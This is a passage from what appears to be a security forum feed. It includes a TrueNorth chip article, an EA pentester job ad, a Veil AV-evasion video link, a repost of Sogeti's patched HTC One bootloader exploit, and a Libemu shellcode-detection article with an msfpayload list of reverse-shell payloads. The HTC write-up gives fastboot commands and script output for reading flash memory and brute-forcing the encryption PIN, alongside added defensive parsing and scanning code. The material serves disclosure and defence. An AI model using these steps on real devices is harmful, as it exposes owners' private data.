      The new processor has 5.4 billion transistors organized into 4096 cores, and this structure is logically organized into one million artificial neurons and 256 million synapses. Each of these cores has a storage capacity of over 100,000 bits and a set of synaptic links to the adjacent cores, which lets it store and process information in the same memory space, remember the neurons from which it received or to which it sent data, and weigh the strength of the interconnections, just like a human brain. Each core also contains the hardware needed to address a specific neuron in another core, the data being generated in bursts and sent through the shared synaptic network from node to node until it reaches its destination.

      When a core has nothing to process, it stops, and this asynchronous mode of operation is also reflected in superior energy efficiency. Manufactured by Samsung on a 28-nanometer process, the SyNAPSE TrueNorth processor runs at a frequency of only 1 KHz and draws a tiny 70 mW. These processors can in turn be grouped into more powerful processing units, and IBM says the technological leap is overwhelming: a system that fits in the palm of a hand offers the processing power of an entire rack of traditional computing systems, and comparative energy tests have shown SyNAPSE TrueNorth to be 176,000 times more efficient than a standard computing system and 7000 times more efficient than current specialized hardware.

      The biggest problem of the new processor is the poor software offering at this moment. The SyNAPSE hardware implementation started from a software solution called Compass, and all Compass applications are compatible with TrueNorth. To make the most of this processor in every possible field, IBM and the other interested companies will have to develop more complex and more varied software solutions. The company believes, however, that the moment when we will see implementations with hundreds of thousands of cores, hundreds of millions of neurons and hundreds of billions of synapses will come in the near future, and that this will revolutionize the entire IT industry.

      Source: IBM SyNAPSE TrueNorth, creierul uman într-o pastilă de siliciu
  15. Scammer. Topic closed.
  16. Scam trade
      We've got it clear now. You're a scammer. Permanent ban.
  17. If anyone wants to give a presentation, they can contact me. If anyone can find a sponsorship, for example at the company they work for, please contact me.
  18. Application Security Analyst
      Req. Number: 37027
      Location Information: Bucharest, BUCHAREST, Romania

      We're EA—the world's largest video game publisher. You're probably familiar with many of our titles—Madden, FIFA, The Sims, Need for Speed, Dead Space, Battlefield and Star Wars, to name a few. But maybe you don't know how we're committed to creating games for every platform—from social to mobile to console—to give our consumers that anytime, anywhere access they demand. What does that mean for you? It means more opportunities to unleash your creative genius, be inspired by those around you and ignite your path in any direction you choose.

      Application Security Specialist & Penetration Tester

      Summary: The Application Security Specialist and Penetration Tester is a member of the RedTeam within the Security and Risk Management (SRM) group, which provides security governance and support for EA's business worldwide. We see the Application Security Specialist and Penetration Tester as a special breed of security consultant that tries to break into or find possible exploits in different computer systems and software. Some might call this position ethical hacker; what we're looking for is a truly gifted, security minded hacker. You will be expected to find and exploit vulnerabilities in EA's applications and infrastructure and fill out assessment reports to detail the findings. While you will often be running pre-determined types of tests based on industry standards, you will also be designing your own tests a large portion of the time, which requires creativity and imagination, along with a superb level of technical knowledge. With these tests and assessments, you'll be conducting regular security audits from both a logical/theoretical and a technical/hands-on standpoint. By identifying which flaws can be exploited to cause business risk, you will provide crucial insights into the most pressing issues and suggest how to prioritize security resources.

      The main focuses for this role are:
      • To conduct dynamic application security analysis on a multitude of platforms: PC, web, mobile and consoles
      • To exploit security flaws and vulnerabilities with attack simulations on multiple projects working against specific focused scopes of work
      • To perform infrastructure security assessments (network and server side related security tasks)
      • To advise and consult with EA staff in order to reduce risks
      • To provide relevant metrics (improve existing and develop new ones) that allow the general business and SRM to understand risk as it pertains to the business and products
      • Solve complex technical problems and articulate them to non-IT personnel
      • Perform, review and analyze security vulnerability data to identify applicability and false positives
      • Research and develop testing tools, techniques, and process improvements
      • Teach, learn and develop the skillset with the RedTeam

      In addition the successful candidate will:
      • Have the ability to flow from black box to gray box to white box tests
      • Work with product teams as well as core IT applications, infrastructure and operations to enhance the security of the corporation; communication and exposure to the management team will be required for this role
      • Provide SRM with information necessary to improve security throughout the organization in SRM's ongoing programs such as Security Awareness
      • Enhance the existing library of development examples and materials to improve integrating security into the Software Development Life-Cycle (SDLC)
      • Write guidelines and best practices from penetration test findings so teams can follow best practices on future development efforts

      Job required knowledge, skills and abilities:
      • Relevant similar experience
      • Very good understanding of OWASP Top 10
      • Experience with the inner workings and security aspects of a variety of Application Servers, Web Servers, Media/Content Servers, Messaging Servers, Database Servers, and Integration Servers
      • Excellent networking skills in multiple environments
      • Experience with multiple Layer 7 intercepting proxies
      • Knowledge of recognized security industry standards and best practices such as OWASP Testing Project, OSSTMM, PCI DSS, ISO 27000 set
      • Good understanding of application development in multiple languages such as ASP.NET, Java, C/C++, and common scripting languages
      • Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff

      Additional, nice to have, skills and education:
      • Bachelor's degree in an information technology related field
      • An information security certification like CEH, ECSA, LPT, CCSP, CISSP, Security+
      • Experience with web application security assessment tools: HP WebInspect, Qualys, Burp Suite
      • Involvement in security related Open Source projects and security groups

      Job Setting: The duties of this position will be performed at EA's office in Bucharest. The candidate will be expected to work alone, around others, under minimal supervision and tight deadlines. Occasional travel will be required.

      It's not easy building the world's best digital playground. It's hair-standing-on-end exhilarating. It's down-in-the-trenches challenging. It's stroke-of-brilliance-at-midnight creative. It's you—taking risks, challenging yourself, pursuing ideas, changing the way millions of people do something they love: play. In an industry that's changing every day, EA is positioned for growth thanks to smart business plans, strategic acquisitions, and most importantly, our creative people around the world who gather each day to unite the world through play. We take that last part very seriously, so if what you're reading excites you as much as it does us, apply today.

      To apply: http://careersearch.ea.com/ro/bucharest/it/jobid5649661-application-security-analyst-jobs
      Or, if you want your CV to land directly where it should, you can send it to me by PM and I'll forward it.
  19. Ok, now we can discuss this differently.
  20. Scam trade
    Leave the staff out of it. Clear up the problem.
  21. Basic Dynamic Analysis With Ida Pro And Windbg
Description: In this video you will learn how to use IDA Pro and WinDBG for basic dynamic analysis. These tools are very powerful for the reverse engineering process, malware analysis, and vulnerability finding.
Source: OpenSecurity Research
Source: Basic Dynamic Analysis With Ida Pro And Windbg
  22. Veil Framework - Create A Undetected Backdoor
Description: In this video you will learn how to use the Veil Framework for penetration testing. This is a very good solution for AV evasion. Nowadays our first challenge is to bypass AV, and this framework is all about AV evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions. https://www.veil-framework.com/framework/veil-evasion/
Source: Veil Framework - Create A Undetected Backdoor
  23. Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password
By cedric, Wednesday 23 July 2014, 11:50 - Forensics

TL;DR

This article deals with the presence of the « read_mmc » command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability was reported to HTC in February 2014 and has been fixed with the Kit Kat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it will be addressed in operators' ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it.

The « read_emmc » command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly get sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automatic way that would not be possible without it. It opens an additional breach against users that define easily-guessable PIN/passcodes (such as a 4-digit PIN). It is often the case because this same PIN/passcode is also used to unlock the phone on a daily basis.

Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption. The "read_mmc" command appears to be a debug function that is not on every HTC phone. In our opinion, this command should not appear in any released phone.

This article details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the « read_mmc » debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user protected data.
Accessing the flash memory

The HTC One is powered down and plugged into our computer. Then it is put in fastboot mode. This can be done by holding the VOL DOWN + POWER buttons, then releasing POWER while holding VOL DOWN. Then, we can switch from HBOOT to fastboot mode. From there, we can use the "fastboot" binary from the Android SDK to read the flash memory. The command has the following format:

    command format: read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show]

The arguments are defined as such:
- first parameter tells where to read from: "emmc" to read the flash, "sd" to read the sdcard
- start: offset (in blocks, i.e. 512-byte units) in the raw flash memory
- #blocks: number of blocks to read
- #blocks/read: number of blocks to read at a time
- show: set to 1 to display the result

An advised user may have noticed it is called "read_mmc" here instead of the older "read_emmc" command, but its purpose is the same. To read the first sector, one can use the following command:

    $ fastboot oem read_mmc emmc 0 1 1 1
    ...
    (bootloader) reading sector 0 ~ 0
    (bootloader) 0
    ...
    (bootloader) 0
    (bootloader) DF
    (bootloader) FF
    (bootloader) 3
    (bootloader) 0
    (bootloader) 20
    (bootloader) E0
    (bootloader) 9F
    (bootloader) 3
    (bootloader) 55
    (bootloader) AA
    (bootloader) read sector done average = 172
    OKAY [ 0.310s]
    finished. total time: 0.311s

We can see it has lots of zeros at the beginning (more than 400 bytes) and it ends with the "55 AA" magic bytes, the magic for a partition table. Using an ADB shell on the device, we see the userdata partition is the "mmcblk0p37" block device and starts at the 6422528th sector. It corresponds to the "ext4" partition mounted under Android.

    shell@android# cat /proc/emmc
    dev: size erasesize name
    ...
    mmcblk0p37: 680000000 00000200 "userdata"
    shell@android:# cat /sys/block/mmcblk0/mmcblk0p37/start
    6422528
    shell@android:# mount
    ...
    /dev/block/mmcblk0p37 /data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,data=ordered 0 0

Consequently, an attacker can use the "read_mmc" command and the previous offset (6422528 and after) in the flash memory to read any sector within the userdata partition, even if the user defined a PIN/passcode to protect his phone.

    $ fastboot oem read_mmc emmc 6422530 1 1 1
    ...
    (bootloader) reading sector 6422530 ~ 6422530
    (bootloader) 0
    ...
    (bootloader) 2F
    (bootloader) 64
    (bootloader) 61
    (bootloader) 74
    (bootloader) 61
    ...
    (bootloader) read sector done average = 146
    OKAY [ 0.359s]
    finished. total time: 0.359s

The "2F 64 61 74 61" sequence of bytes is the "/data" ASCII string that is located at the beginning of the userdata partition.

As we already detailed in the previous article, the first idea we had was to dump the whole userdata partition from the flash memory. However, it is really slow and it would take several days or even months. As a side note, the HTC One phone does not discharge when in HBOOT/fastboot modes and plugged into a computer. So it is theoretically "easier" to make a whole dump than it was with the HTC Desire Z. Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One.
Bypassing the Android Full Disk Encryption (FDE)

When working on the HTC Desire Z, there was no "Full Disk Encryption" (FDE) option available because it was Android 2.x at that time, and encryption is not supported before Android 4.x for mobile phones. We decided to analyze whether there was a way to bypass FDE using the "read_mmc" vulnerability. Thomas Cannon published at Defcon back in 2012 his excellent slides showing how FDE works for default Android (based on the Android source code, a.k.a. AOSP) and scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time, he was working on the Google Nexus S, which is a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different with our HTC One, since it was HTC who built it from its own version of modified AOSP and hardware.

We decided to encrypt the device by enabling it in "Storage > Phone storage encryption". After dumping all the partitions and diffing them with a dump we made before encryption, we easily notice the "extra" partition is the FDE header used to store the encrypted master key. As detailed in Thomas' slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for the /data sector decryption (aes-cbc-essiv:sha256).

    $ hexdump -C extra
    00000000 c4 b1 b5 d0 01 00 00 00 68 00 00 00 00 00 00 00 |........h.......|
    00000010 20 00 00 00 00 00 00 00 00 00 40 03 00 00 00 00 | .........@.....|
    00000020 00 00 00 00 61 65 73 2d 63 62 63 2d 65 73 73 69 |....aes-cbc-essi|
    00000030 76 3a 73 68 61 32 35 36 00 00 00 00 00 00 00 00 |v:sha256........|
    00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    *
    00000060 00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c |.............T@.|
    00000070 b4 c1 e4 91 69 10 4b 55 2e 47 64 31 13 52 ad 2d |....i.KU.Gd1.R.-|
    00000080 bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00 |..B.............|
    00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    000000a0 00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39 |..........4....9|
    000000b0 0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00 |.J..............|
    000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    *
    00000200

Note: for further details on the master key derivation and data decryption internals, we definitely advise you to have a look at Thomas' slides.

Since we located where the encryption header is, we easily get the offset in the flash memory where it is stored.

    shell@android# cat /proc/emmc
    dev: size erasesize name
    ...
    mmcblk0p27: 00010000 00000200 "extra"
    shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start
    586799

Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell it: "This is an encrypted device:)". This is some kind of addition made by HTC for the HTC One specifically. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected.

    shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64
    00000000 54 68 69 73 20 69 73 20 61 6e 20 65 6e 63 72 79 |This is an encry|
    00000010 70 74 65 64 20 64 65 76 69 63 65 3a 29 6f c3 a0 |pted device:)o..|
    00000020 26 bc 76 ed a8 77 ef 6a 95 28 32 ab 24 ce 8d 58 |&.v..w.j.(2.$..X|
    00000030 91 fe 8e 14 9e 81 05 a4 28 65 64 3c 1b e2 11 56 |........(ed<...V|
    00000040

We can then check that we can access this header and the encrypted userdata partition from the fastboot "read_mmc" command, which is indeed possible.

    $ fastboot oem read_mmc emmc 586799 1 1 1

From this, we can build a small script that will read the FDE header (located in the "extra" partition) and the first sector of the "userdata" partition and bruteforce them locally from our computer.

    # python bruteforce_htcone_over_reademmc.py
    oem read_mmc emmc 6422528 1 1 1
    oem read_mmc emmc 586799 1 1 1
    Footer File    : extra
    Magic          : 0xD0B5B1C4
    Major Version  : 1
    Minor Version  : 0
    Footer Size    : 104 bytes
    Flags          : 0x00000000
    Key Size       : 256 bits
    Failed Decrypts: 0
    Crypto Type    : aes-cbc-essiv:sha256
    Encrypted Key  : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400
    Salt           : 0xC71F34809709FD390B4A91D9D9D800CD
    ----------------
    Trying to Bruteforce Password... please wait
    Found PIN!: 0000
    Saving decrypted master key to 'keyfile'

We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little bit of time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis.
The PIN/passcode set up by the user is used for both:
(1) decrypting the phone when it is switched on
(2) accessing the phone after a given delay during regular daily use

Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one such as having digits and letters) makes sense. Moreover, encrypting a phone using schemes instead of a PIN/password is not supported in Android for now. We can add that it would not help against bruteforce, since the scheme is stored as a sequence of numbers that do not repeat.

Mounting the userdata encrypted partition (remotely over USB)

Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and enter the found PIN/passcode to bypass the lock screen. Then, he is able to enable ADB and dump everything he wants. We do not need to go further. However, for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.60 in order to support the plain type), specifying the "plain" type, the decryption algorithm (aes-cbc-essiv:sha256) and the "keyfile" holding our previously decrypted master key.

    # mkdir mnt
    # losetup /dev/loop0 userdata.img
    # cryptsetup --type plain open -c aes-cbc-essiv:sha256 -d keyfile /dev/loop0 userdata
    # mount /dev/mapper/userdata mnt

In our case, we can "even" do it over USB using the "read_mmc" command. All the tools to replay these scenarios are released in our github repository.

Again, we would like to thank the HTC security team for their support and for patching this vulnerability in the Kit Kat upgrade.

Source: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab
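An added example (my own code, not the article's script and not the Sogeti tools) that parses the FDE footer shown in the hexdump above and checks, from the defender's side, that the parameters really are the strong ones the article credits (256-bit key, aes-cbc-essiv:sha256, a non-zero salt, a filesystem size consistent with the userdata partition). The field layout follows my reading of `struct crypt_mnt_ftr` in AOSP's `system/vold/cryptfs.h` for Android 4.x and is an assumption, as are the 64-byte cipher-name field and the 32-byte gap between the encrypted key and the salt; the sample sector is reconstructed from the hexdump in the post.

```python
"""Parse and sanity-check an Android FDE crypto footer (the "extra" partition).

Added example; not code from the article or the Sogeti tools. Field layout is
an assumption based on struct crypt_mnt_ftr in AOSP system/vold/cryptfs.h
(Android 4.x). The sample sector is reconstructed from the hexdump in the post.
"""
import struct
from dataclasses import dataclass

CRYPT_MNT_MAGIC = 0xD0B5B1C4      # magic shown in the post's script output
MAX_CRYPTO_TYPE_NAME_LEN = 64     # assumed: null-terminated cipher spec field
KEY_TO_SALT_PADDING = 32          # assumed: gap between encrypted key and salt
SALT_LEN = 16
SECTOR = 512

# magic u32, major u16, minor u16, ftr_size u32, flags u32, keysize u32,
# spare1 u32, fs_size u64 (in 512-byte sectors), failed_decrypt_count u32
FIXED = struct.Struct("<IHHIIIIQI")


@dataclass
class CryptFooter:
    major: int
    minor: int
    ftr_size: int
    flags: int
    keysize: int              # bytes
    fs_size_sectors: int
    failed_decrypt_count: int
    crypto_type: str
    encrypted_key: bytes
    salt: bytes


def parse_crypt_footer(blob: bytes) -> CryptFooter:
    """Decode the fixed header, then the key at ftr_size and the salt after it."""
    if len(blob) < FIXED.size + MAX_CRYPTO_TYPE_NAME_LEN:
        raise ValueError("footer too short")
    (magic, major, minor, ftr_size, flags, keysize,
     _spare1, fs_size, failed) = FIXED.unpack_from(blob, 0)
    if magic != CRYPT_MNT_MAGIC:
        raise ValueError(f"bad magic 0x{magic:08X}")
    name_raw = blob[FIXED.size:FIXED.size + MAX_CRYPTO_TYPE_NAME_LEN]
    crypto_type = name_raw.split(b"\0", 1)[0].decode("ascii")
    key = blob[ftr_size:ftr_size + keysize]
    salt_off = ftr_size + keysize + KEY_TO_SALT_PADDING
    salt = blob[salt_off:salt_off + SALT_LEN]
    if len(key) != keysize or len(salt) != SALT_LEN:
        raise ValueError("footer truncated before key/salt")
    return CryptFooter(major, minor, ftr_size, flags, keysize, fs_size,
                       failed, crypto_type, key, salt)


def audit_footer(ftr: CryptFooter, userdata_bytes: int) -> list:
    """Defender-side checks: do the parameters match what the post calls strong?"""
    findings = []
    if ftr.keysize * 8 < 256:
        findings.append(f"master key is only {ftr.keysize * 8} bits")
    if ftr.crypto_type != "aes-cbc-essiv:sha256":
        findings.append(f"unexpected cipher spec {ftr.crypto_type!r}")
    if ftr.salt == bytes(SALT_LEN):
        findings.append("salt is all zeros")
    if ftr.fs_size_sectors * SECTOR != userdata_bytes:
        findings.append("fs_size does not match the userdata partition size")
    return findings


def sample_extra_sector() -> bytes:
    """Constructed: the 512-byte 'extra' sector as printed by hexdump in the post."""
    sec = bytearray(SECTOR)
    sec[0x00:0x40] = bytes.fromhex(
        "c4b1b5d0010000006800000000000000"   # magic, version 1.0, ftr_size 0x68, flags
        "20000000000000000000400300000000"   # keysize 0x20, spare, fs_size 0x3400000
        "000000006165732d6362632d65737369"   # failed_decrypt 0, "aes-cbc-essi"
        "763a7368613235360000000000000000")  # "v:sha256\0..."
    sec[0x68:0x88] = bytes.fromhex(
        "15d29c161c54401cb4c1e49169104b552e4764311352ad2dbd8c428ed6c48400")
    sec[0xa8:0xb8] = bytes.fromhex("c71f34809709fd390b4a91d9d9d800cd")
    return bytes(sec)


# Size of mmcblk0p37 ("userdata") in bytes, as listed in /proc/emmc in the post
USERDATA_BYTES = 0x680000000


def main():
    ftr = parse_crypt_footer(sample_extra_sector())
    print(f"version {ftr.major}.{ftr.minor}, footer {ftr.ftr_size} bytes, "
          f"key {ftr.keysize * 8} bits, cipher {ftr.crypto_type}")
    print("encrypted key:", ftr.encrypted_key.hex().upper())
    print("salt:", ftr.salt.hex().upper())
    print("fs_size:", ftr.fs_size_sectors, "sectors")
    print("findings:", audit_footer(ftr, USERDATA_BYTES) or "none")


if __name__ == "__main__":
    main()
```

The parsed values match the script output quoted in the post (footer size 104, key size 256 bits, the same encrypted key and salt), and `fs_size` comes out as 0x3400000 sectors, exactly the 0x680000000 bytes of mmcblk0p37. The audit also shows what the footer cannot help with: `failed_decrypt_count` is only honoured by the on-device mount path, so once the header and one sector have been read out, the PIN's length is the only remaining defence, which is the article's point.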
  24. Shellcode Detection and Emulation with Libemu

Introduction

Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/honeypot systems for emulating x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, to analyze shellcode inside malicious .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article.

The very first thing we can do is download Libemu via Git with the following command:

    # git clone git://git.carnivore.it/libemu.git

If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it's evident that about 50k lines of code have been written.

The installation instructions can be found at [1], which is why we won't describe them in this article. We can also install Pylibemu, so we can interact with Libemu directly from Python.

Creating the Shellcode

Let's create a simple test case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, which is a command-line tool specifically built to generate and output various versions of shellcode. Let's first list all Linux payloads by grepping for the "linux" keyword through the msfpayload command output.
    # msfpayload -l 2>&1 | grep linux
    linux/armle/adduser                      Create a new user with UID 0
    linux/armle/exec                         Execute an arbitrary command
    linux/armle/shell/bind_tcp               Listen for a connection, dup2 socket in r12, then execve
    linux/armle/shell/reverse_tcp            Connect back to the attacker, dup2 socket in r12, then execve
    linux/armle/shell_bind_tcp               Connect to target and spawn a command shell
    linux/armle/shell_reverse_tcp            Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp           Connect back to attacker and spawn a command shell
    linux/mipsle/shell_bind_tcp              Listen for a connection and spawn a command shell
    linux/mipsle/shell_reverse_tcp           Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp                 Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port                Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp              Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp               Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port              Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp            Connect back to attacker and spawn a command shell
    linux/x86/exec                           Execute an arbitrary command
    linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
    linux/x86/shell_bind_tcp_random_port
    linux/x86/shell_find_port                Spawn a shell on an established connection
    linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
    linux/x86/adduser                        Create a new user with UID 0
    linux/x86/chmod                          Runs chmod on specified file with specified mode
    linux/x86/exec                           Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp      Listen for a connection over IPv6, Staged meterpreter server
    linux/x86/meterpreter/bind_nonx_tcp      Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/bind_tcp           Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/find_tag           Use an established connection, Staged meterpreter server
    linux/x86/meterpreter/reverse_ipv6_tcp   Connect back to attacker over IPv6, Staged meterpreter server
    linux/x86/meterpreter/reverse_nonx_tcp   Connect back to the attacker, Staged meterpreter server
    linux/x86/meterpreter/reverse_tcp        Connect back to the attacker, Staged meterpreter server
    linux/x86/metsvc_bind_tcp                Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp             Stub payload for interacting with a Meterpreter Service
    linux/x86/read_file                      Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
    linux/x86/shell/bind_ipv6_tcp            Listen for a connection over IPv6, Spawn a command shell (staged)
    linux/x86/shell/bind_nonx_tcp            Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/find_tag                 Use an established connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_ipv6_tcp         Connect back to attacker over IPv6, Spawn a command shell (staged)
    linux/x86/shell/reverse_nonx_tcp         Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_ipv6_tcp            Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
    linux/x86/shell_bind_tcp_random_port
    linux/x86/shell_find_port                Spawn a shell on an established connection
    linux/x86/shell_find_tag                 Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2             Connect back to attacker and spawn a command shell

Full article: Shellcode Detection and Emulation with Libemu - InfoSec Institute
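An added example, not from the InfoSec Institute article and not libemu's own code, of the GetPC heuristics the introduction mentions: a scanner that flags the x86 idioms position-independent shellcode uses to learn its own address (a `call` whose target begins with a `pop`, and `fnstenv [esp-0xc]`), which is the kind of candidate-offset test an emulator applies before it tries to execute a buffer (my understanding of libemu's approach, so treat that as an assumption). The sample buffers are constructed GetPC stubs plus an HTTP request as a benign control.

```python
"""GetPC heuristics over a byte buffer.

Added example, my own code rather than libemu's: it flags the x86 idioms
shellcode uses to find its own address, the kind of candidate-start test an
emulator runs before executing a buffer. All sample buffers are constructed.
"""

POP_R32 = range(0x58, 0x60)                 # pop eax .. pop edi
FNSTENV_ESP_MINUS_12 = b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]


def find_getpc_candidates(buf: bytes) -> list:
    """Return (offset, kind) pairs for likely GetPC sequences, sorted by offset."""
    hits = []
    n = len(buf)
    for i in range(n):
        # Pattern 1: call rel32 whose target begins with a pop r32.
        # Covers "call $+5; pop" (rel32 == 0) as well as the jmp/call/pop
        # layout, where the call jumps backwards onto the pop.
        if buf[i] == 0xE8 and i + 5 <= n:
            rel = int.from_bytes(buf[i + 1:i + 5], "little", signed=True)
            target = i + 5 + rel
            if 0 <= target < n and buf[target] in POP_R32:
                hits.append((i, "call/pop"))
        # Pattern 2: fnstenv [esp-0xc] writes the FPU environment so that the
        # address of the last FPU instruction lands at the top of the stack.
        if buf[i:i + 4] == FNSTENV_ESP_MINUS_12:
            hits.append((i, "fnstenv"))
    return sorted(hits)


# Constructed samples (not real payloads): bare GetPC stubs plus filler.
# nop; nop; call $+5; pop ebx; xor eax, eax
SAMPLE_CALL_POP = b"\x90\x90" + b"\xe8\x00\x00\x00\x00" + b"\x5b" + b"\x31\xc0"
# jmp short +4 (to the call); pop esi at offset 2; call at 6 jumps back to 2
SAMPLE_JMP_CALL_POP = b"\xeb\x04" + b"\x5e" + b"\x90\x90\x90" + b"\xe8\xf7\xff\xff\xff"
# fldz; fnstenv [esp-0xc]; pop ebx
SAMPLE_FNSTENV = b"\xd9\xee" + b"\xd9\x74\x24\xf4" + b"\x5b"
# Benign control: plain ASCII never contains 0xE8 or 0xD9
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"


def scan_many(samples: dict) -> dict:
    """Run the heuristic over named buffers (e.g. payload slices cut from a pcap)."""
    return {name: find_getpc_candidates(data) for name, data in samples.items()}


if __name__ == "__main__":
    results = scan_many({
        "call_pop": SAMPLE_CALL_POP,
        "jmp_call_pop": SAMPLE_JMP_CALL_POP,
        "fnstenv": SAMPLE_FNSTENV,
        "benign": SAMPLE_BENIGN,
    })
    for name, hits in results.items():
        print(f"{name:14s} {hits or 'no GetPC candidates'}")
```

A scanner like this is a triage step only: `call`/`pop` pairs also occur in legitimate code, so the offsets it reports are start candidates that an emulator such as libemu then confirms by actually running them and watching for the syscalls or API calls the article goes on to describe.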
  25. Worth listening to. "Ennnumereitor"